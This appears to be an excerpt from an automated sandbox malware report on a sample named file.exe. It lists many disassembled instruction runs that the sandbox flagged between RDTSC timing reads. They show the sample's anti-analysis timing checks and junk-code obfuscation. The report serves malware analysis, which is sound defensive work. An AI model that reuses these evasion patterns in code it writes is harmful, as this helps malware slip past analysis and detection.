0x0000009e jmp 00007FAF78D3F536h 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5152 second address: EF5158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF560F second address: EF5614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5614 second address: EF561A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5812 second address: EF5818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5818 second address: EF5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5A19 second address: EF5A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAF78D3F526h 0x0000000a popad 0x0000000b jmp 00007FAF78D3F537h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FAF78D3F528h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+12453751h] 0x00000034 push 00000004h 0x00000036 mov ecx, dword ptr [ebp+122D224Eh] 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FAF78D3F539h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5F17 second address: EF5F1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5F1D second address: EF5F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5F23 second address: EF5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF6138 second address: EF61C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F530h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FAF78D3F52Ch 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FAF78D3F528h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b add dword ptr [ebp+122D32D0h], edx 0x00000031 movsx edx, di 0x00000034 lea eax, dword ptr [ebp+12489C97h] 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007FAF78D3F528h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 jmp 00007FAF78D3F533h 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c jnl 00007FAF78D3F52Ch 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF61C8 second address: EF61CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CA2A second address: F2CA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F52Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FAF78D3F52Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CA4F second address: F2CA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CA53 second address: F2CA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CA57 second address: F2CA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAF7914BECDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CEE3 second address: F2CEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CEE7 second address: F2CF1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BED7h 0x00000007 jmp 00007FAF7914BED9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2CF1B second address: F2CF3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FAF78D3F526h 0x00000009 jmp 00007FAF78D3F538h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2D1F9 second address: F2D22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FAF7914BED8h 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAF7914BED1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F33497 second address: F3349D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3349D second address: F334B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7914BECEh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F334B0 second address: F334B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31FAB second address: F31FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31FAF second address: F31FE2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF78D3F526h 0x00000008 jne 00007FAF78D3F526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FAF78D3F52Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAF78D3F537h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31FE2 second address: F31FF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7914BECCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32424 second address: F3242D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32563 second address: F32567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32567 second address: F3256B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3256B second address: F32571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32571 second address: F3257C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3257C second address: F32581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32581 second address: F3259D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF78D3F52Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF78D3F52Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3259D second address: F325AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF7914BECCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F325AE second address: F325B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32DA4 second address: F32DCC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FAF7914BED4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FAF7914BED2h 0x00000011 jbe 00007FAF7914BEC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F32DCC second address: F32DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jno 00007FAF78D3F526h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jne 00007FAF78D3F526h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3331A second address: F3331E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F31CF2 second address: F31D02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF78D3F526h 0x00000008 jnp 00007FAF78D3F526h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F372BD second address: F372C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F375F9 second address: F375FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F375FF second address: F37604 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F37604 second address: F3760A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4CA1 second address: EA4CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FAF7914BED1h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FAF7914BEC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4CC4 second address: EA4CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F39AC3 second address: F39AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3EB0A second address: F3EB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E115 second address: F3E119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E119 second address: F3E134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF78D3F533h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E134 second address: F3E138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E138 second address: F3E142 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF78D3F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E68D second address: F3E6CA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FAF7914BECCh 0x0000000c jbe 00007FAF7914BEC6h 0x00000012 jmp 00007FAF7914BECDh 0x00000017 jmp 00007FAF7914BED3h 0x0000001c popad 0x0000001d pushad 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 pop edx 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43F91 second address: F43F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43F97 second address: F43F9D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F43F9D second address: F43FAD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF78D3F532h 0x00000008 jns 00007FAF78D3F526h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44117 second address: F4411C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44262 second address: F44266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44266 second address: F4427A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAF7914BECEh 0x0000000c jnp 00007FAF7914BEC6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4427A second address: F44291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FAF78D3F531h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44291 second address: F44295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44295 second address: F4429F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5C18 second address: EF5C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EF5C1C second address: EF5CB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 je 00007FAF78D3F528h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 nop 0x00000013 call 00007FAF78D3F52Dh 0x00000018 mov di, F4AFh 0x0000001c pop ecx 0x0000001d mov ebx, dword ptr [ebp+12489C92h] 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FAF78D3F528h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d add eax, ebx 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007FAF78D3F528h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 nop 0x0000005a jmp 00007FAF78D3F536h 0x0000005f push eax 0x00000060 je 00007FAF78D3F534h 0x00000066 pushad 0x00000067 jnp 00007FAF78D3F526h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4804C second address: F48068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAF7914BEC6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FAF7914BECCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F481E8 second address: F48200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FAF78D3F526h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007FAF78D3F526h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F2F0 second address: F4F2F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F2F4 second address: F4F2FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F460 second address: F4F464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4F464 second address: F4F468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5054B second address: F50551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F50AEF second address: F50AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59BE9 second address: F59BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F58DA1 second address: F58DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F52Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F591F9 second address: F591FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F591FD second address: F59209 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAF78D3F526h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F598FC second address: F59900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F59900 second address: F5990A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAF78D3F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5990A second address: F5990F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61C76 second address: F61C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61C7C second address: F61C86 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7914BEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61C86 second address: F61C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61C8B second address: F61CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF7914BECCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61CA4 second address: F61CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F603C9 second address: F603D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60544 second address: F6055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF78D3F534h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6055E second address: F60563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60563 second address: F6056B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6056B second address: F6056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6056F second address: F60573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60929 second address: F6092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6092D second address: F60933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60BFD second address: F60C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FAF7914BED8h 0x0000000b jno 00007FAF7914BEC6h 0x00000011 pop eax 0x00000012 pop edi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F60C28 second address: F60C37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61340 second address: F61344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61344 second address: F61357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FAF78D3F526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61357 second address: F6135C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6135C second address: F61363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F61363 second address: F61381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7914BED6h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5F9BA second address: F5F9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F696F0 second address: F696F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F696F4 second address: F696F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
